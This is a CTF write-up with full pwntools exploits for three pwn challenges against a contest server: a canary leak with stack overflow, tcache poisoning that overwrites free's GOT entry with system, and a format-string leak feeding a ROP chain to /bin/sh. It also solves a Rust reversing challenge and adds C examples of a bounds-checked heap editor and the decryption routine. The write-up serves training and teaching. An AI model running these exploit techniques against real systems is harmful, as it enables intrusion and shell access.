Of course, I don't suggest joining the competition.
PWN-genius
Enter no.
Enter thanks.
Leak the canary, then overflow.
exp:
```python
from pwn import *

context.log_level = 'debug'
io = remote("101.200.155.151", 12000)
io.sendline(b"no")
io.sendline(b'thanks')
init_addr = 0x4011A7

# first write: fill the buffer up to the canary so the leak starts right after 'aaaab'
payload = b'a' * 24 + b'b'
payload1 = b'a' * 0x20 + p64(0xdeadbeef) + p64(init_addr)
io.send(payload)
io.recvuntil(b'aaaab')
canary_var = b'\x00' + io.recv(7)  # + b'\x00'
canary_var = u64(canary_var)
print("cur_cannary_var:", hex(canary_var))

# second write: overflow with the leaked canary in place, then the return address
payload1 = b'a' * 24 + p64(canary_var) + p64(0xdeadbeef) + p64(init_addr)
io.sendline(payload1)
io.interactive()
```
PWN-program: use IDA to analyse the program. Opening the attached .so in IDA shows the libc version is 2.31.
The edit function does not check the length, so we can write beyond a chunk into other heap blocks.
Because libc 2.31 is used, we can use a tcache poisoning attack; reference: https://github.com/shellphish/how2heap/blob/master/glibc_2.31/tcache_poisoning.c
This lets us allocate a chunk over the manager block and build an arbitrary-address write: overwrite free's GOT entry with libc's system, then call free on a heap block whose content is /bin/sh. That runs /bin/sh and completes the exploit.
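As an added example (not the challenge's source, which the writeup does not include), the check a fixed edit() needs, in C: every note records the size it was allocated with, and the edit handler refuses a length larger than that, which is exactly the comparison the writeup says is missing. The note layout, the function names and MAX_NOTES are assumptions; delete() also clears the slot so the index cannot be reused against a freed chunk.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Added example (not the challenge binary's code): a heap-note manager whose
 * edit() refuses writes longer than the chunk it targets. The challenge's edit
 * trusted the user-supplied length, so a long write ran off the end of one
 * chunk into the next chunk's header and data (the tcache poisoning entry point). */

#define MAX_NOTES 16   /* assumed table size */

typedef struct {
    char   *data;   /* heap buffer returned by calloc */
    size_t  size;   /* size requested at allocation, remembered for the bounds check */
} note_t;

static note_t notes[MAX_NOTES];

/* Allocate a note; returns 0 on success, -1 on bad index, occupied slot or OOM. */
int note_add(int index, size_t size) {
    if (index < 0 || index >= MAX_NOTES || notes[index].data != NULL) return -1;
    char *p = calloc(1, size);
    if (!p) return -1;
    notes[index].data = p;
    notes[index].size = size;
    return 0;
}

/* Vulnerable pattern described in the writeup (kept here as a comment only):
 *     read(0, notes[index].data, user_len);   // user_len never compared with size
 * Hardened edit: reject any length larger than the recorded chunk size.
 * Returns the number of bytes written, or -1 if the write is rejected. */
long note_edit(int index, const void *content, size_t len) {
    if (index < 0 || index >= MAX_NOTES || notes[index].data == NULL) return -1;
    if (len > notes[index].size) return -1;   /* the missing comparison */
    memcpy(notes[index].data, content, len);
    return (long)len;
}

/* Free and clear the slot so a later edit() or delete() on this index fails
 * instead of touching a dangling pointer (use-after-free / double free). */
int note_delete(int index) {
    if (index < 0 || index >= MAX_NOTES || notes[index].data == NULL) return -1;
    free(notes[index].data);
    notes[index].data = NULL;
    notes[index].size = 0;
    return 0;
}

int main(void) {
    char big[0x40];
    memset(big, 'a', sizeof big);
    note_add(0, 0x20);
    note_add(1, 0x20);
    printf("oversized edit : %ld\n", note_edit(0, big, sizeof big));  /* -1: rejected */
    printf("in-bounds edit : %ld\n", note_edit(1, "/bin/sh", 8));     /* 8 */
    printf("first delete   : %d\n", note_delete(1));                  /* 0 */
    printf("second delete  : %d\n", note_delete(1));                  /* -1: slot already cleared */
    return 0;
}
```

The same 0x40-byte write that the exploit uses to reach the neighbouring chunk's size field and tcache next pointer is turned away here before memcpy runs, and the stale-index paths that a double free or use-after-free would need return an error as well.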
```python
from pwn import *

io = remote("101.200.155.151", 12300)
libc = ELF("./attachment-23.so")

def add(index, size):
    io.sendlineafter(b'choice:\n', b'1')
    io.sendlineafter(b'index:\n', str(index).encode())
    io.sendlineafter(b'size:\n', str(size).encode())

def dele(index):
    io.sendlineafter(b'choice:\n', b'2')
    io.sendlineafter(b'index:\n', str(index).encode())

def edit(index, size, content):
    io.sendlineafter(b'choice:\n', b'3')
    io.sendlineafter(b'index:\n', str(index).encode())
    io.sendlineafter(b'length:\n', str(size).encode())
    io.sendafter(b'content:\n', content)

def show(index):
    io.sendlineafter(b'choice:\n', b'4')
    io.sendlineafter(b'index:\n', str(index).encode())

add(0, 0x20)
add(1, 0x20)
add(2, 0x20)
add(3, 0x20)
edit(3, 8, b'/bin/sh\x00')
dele(2)
dele(1)
# overflow from chunk 0 into chunk 1's header and tcache next pointer
payload = b'a' * 0x20 + p64(0) + p64(0x31) + p64(0x4040C0)
edit(0, len(payload), payload)
add(1, 0x20)
add(2, 0x20)          # returned from tcache: the manager block
payload = p64(0x404018) + p64(0x404018)
edit(2, len(payload), payload)
show(0)
cur_addr = io.recv(6) + b'\x00\x00'
cur_addr = u64(cur_addr)
print("cur_addr:", hex(cur_addr))
libc.address = cur_addr - libc.sym['free']
payload = p64(libc.sym['system'])
edit(1, len(payload), payload)
dele(3)
io.interactive()
```
Of course, other methods can be used to attack the vulnerable program!
PWN-Fufu: format string + stack overflow
Use the format string to leak the libc address and the canary cookie value, then exploit directly using the offsets.
Format string vulnerability location
Stack overflow location
exp:
```python
from pwn import *

io = remote("101.200.155.151", 12600)
local = False

def leak_data(s):
    io.sendlineafter(b'Furina: Your choice? >> ', b'1')
    io.sendlineafter(b'Furina: Time is limited! >> ', b'6')
    io.sendlineafter(b'Furina: Present your evidence! >> ', s)

def exploit(s):
    io.sendlineafter(b'Furina: Your choice? >> ', b'2')
    io.sendlineafter(b'Furina: The trial is adjourned', s)

# leak the canary and the __libc_start_main return address from the stack
leak_data(b'%21$p')
canary = int(io.recv(len('0x97dac0759ad25c00')), 16)
io.sendline(b'1')
leak_data(b'%23$p')
libc_main_ret = int(io.recv(len('0x7ffff7c23a90')), 16)
io.sendline(b'1')
print("canary:", hex(canary))
print("libc:", hex(libc_main_ret))

if local:
    libc_base = libc_main_ret - 0x23a90
    o_pop_rdi = 0x00000000000240e5
    o_system = 0x000000000004ebf0
    o_bin_sh_addr = 0x1b51d2
else:
    libc_base = libc_main_ret - 0x29d90
    o_pop_rdi = 0x000000000002a3e5
    o_system = 0x050d70
    o_bin_sh_addr = 0x1d8678

pop_rdi = libc_base + o_pop_rdi
system_addr = libc_base + o_system
bin_sh_addr = libc_base + o_bin_sh_addr
# pop_rdi + 1 is a lone ret, used to realign the stack before system
payload = b'a' * 72 + p64(canary) + p64(0xdeadbeef) + p64(pop_rdi + 1) + p64(pop_rdi) + p64(bin_sh_addr) + p64(system_addr)
exploit(payload)
io.interactive()
```
Reverse-greeting: Rust language reverse engineering
Search for strings to quickly find the important location.
There is an anti-debug check: IsDebuggerPresent.
Analyse the function.
So write a Python script to simulate the encryption, then decrypt the string to get the flag.
```python
"""
Decompiled loop body from IDA:
v30 = (0xCCCCCCCCCCCCCCCDuLL * (unsigned __int128)(unsigned __int64)i) >> 64;
LOBYTE(v30) = (unsigned __int8)v30 >> 2;
v31 = __ROL1__(v27[i] ^ (i + 90), i - 5 * v30);
"""

def __rol__(a, b):
    return (a << b | a >> (8 - b)) & 0xff

def ror(a, b):
    return (a >> b | a << (8 - b)) & 0xff

# simulate the encryption on a test string
s = 'dsfsfadsfsfsfsd'
for i in range(len(s)):
    cur_f = ord(s[i])
    v30 = (0xCCCCCCCCCCCCCCCD * i) >> 64
    v30 = v30 >> 2
    cur_f = cur_f ^ (i + 90)
    cur_f = cur_f & 0xff
    cur_f = __rol__(cur_f, i - 5 * v30)
    print(hex(cur_f))
print()

# decrypt the ciphertext bytes taken from the binary
s = [0x13, 0x10, 0x7C, 0xF0, 0x52, 0x67, 0x52, 0xCC,
     0x79, 0x55, 0x0C, 0x48, 0x59, 0, 0xa0, 0x14]
for i in range(len(s)):
    cur_f = s[i]
    v30 = (0xCCCCCCCCCCCCCCCD * i) >> 64
    v30 = v30 >> 2
    cur_f = cur_f & 0xff
    cur_f = ror(cur_f, i - 5 * v30)
    cur_f = cur_f ^ (i + 90)
    cur_f = cur_f & 0xff
    print(chr(cur_f), end='')
```
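As an added example (not the challenge binary and not the writeup's script), the same transform written out in C with its inverse. It goes a step further than the script: it checks that the multiply-by-0xCCCCCCCCCCCCCCCD-and-shift the compiler emitted is an unsigned divide by 5, so `i - 5 * v30` is simply `i % 5`, and it verifies that the decrypt step is the exact inverse of the encrypt step for every byte value before running it on the ciphertext bytes listed in the script. Function names are mine; `unsigned __int128` assumes GCC or Clang on a 64-bit target.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the challenge's code: the per-byte transform recovered from
 * the decompiled loop, its inverse, and a check that the magic constant is the
 * compiler's idiom for division by 5. Requires unsigned __int128 (GCC/Clang, 64-bit). */

/* (0xCCCCCCCCCCCCCCCD * i) >> 64 >> 2 == i / 5 for every 64-bit i: the constant
 * is ceil(2^66 / 5), the usual reciprocal used for unsigned division by 5. */
uint64_t div5_magic(uint64_t i) {
    unsigned __int128 prod = (unsigned __int128)0xCCCCCCCCCCCCCCCDULL * i;
    return (uint64_t)(prod >> 64) >> 2;
}

/* Returns 1 if the magic multiply agrees with plain division for all i < limit. */
int magic_is_div5(uint64_t limit) {
    for (uint64_t i = 0; i < limit; i++)
        if (div5_magic(i) != i / 5) return 0;
    return 1;
}

static uint8_t rol8(uint8_t v, unsigned n) {
    n &= 7;
    return (uint8_t)((v << n) | (v >> ((8 - n) & 7)));
}

static uint8_t ror8(uint8_t v, unsigned n) {
    n &= 7;
    return (uint8_t)((v >> n) | (v << ((8 - n) & 7)));
}

/* Encryption as decompiled: xor byte i with (i + 90), then rotate left by
 * i - 5 * (i / 5), which is i % 5. */
uint8_t enc_byte(size_t i, uint8_t c) {
    unsigned rot = (unsigned)(i - 5 * div5_magic(i));
    return rol8((uint8_t)(c ^ (uint8_t)(i + 90)), rot);
}

/* Inverse: rotate right by the same amount, then undo the xor. */
uint8_t dec_byte(size_t i, uint8_t c) {
    return (uint8_t)(ror8(c, (unsigned)(i % 5)) ^ (uint8_t)(i + 90));
}

/* Decrypt n bytes of cipher into out; out must hold n + 1 bytes (NUL added). */
void decrypt_buf(const uint8_t *cipher, size_t n, char *out) {
    for (size_t i = 0; i < n; i++) out[i] = (char)dec_byte(i, cipher[i]);
    out[n] = '\0';
}

/* Returns 1 if dec(enc(x)) == x for every byte value at every index < n. */
int roundtrip_ok(size_t n) {
    for (size_t i = 0; i < n; i++)
        for (unsigned c = 0; c < 256; c++)
            if (dec_byte(i, enc_byte(i, (uint8_t)c)) != (uint8_t)c) return 0;
    return 1;
}

/* Ciphertext bytes exactly as listed in the writeup's script. */
static const uint8_t CIPHER[16] = {
    0x13, 0x10, 0x7C, 0xF0, 0x52, 0x67, 0x52, 0xCC,
    0x79, 0x55, 0x0C, 0x48, 0x59, 0x00, 0xA0, 0x14
};

int main(void) {
    char flag[sizeof CIPHER + 1];
    decrypt_buf(CIPHER, sizeof CIPHER, flag);
    printf("magic == i/5 for i < 100000 : %d\n", magic_is_div5(100000));
    printf("round trip ok               : %d\n", roundtrip_ok(64));
    printf("decrypted                   : %s\n", flag);
    return 0;
}
```

Recognising the reciprocal-multiply idiom is the useful habit here: once `v30` is read as `i / 5`, the rotation count collapses to `i % 5` and the whole routine is a xor with a position-dependent key followed by a small rotation, which is why the inverse is just the two steps in reverse order.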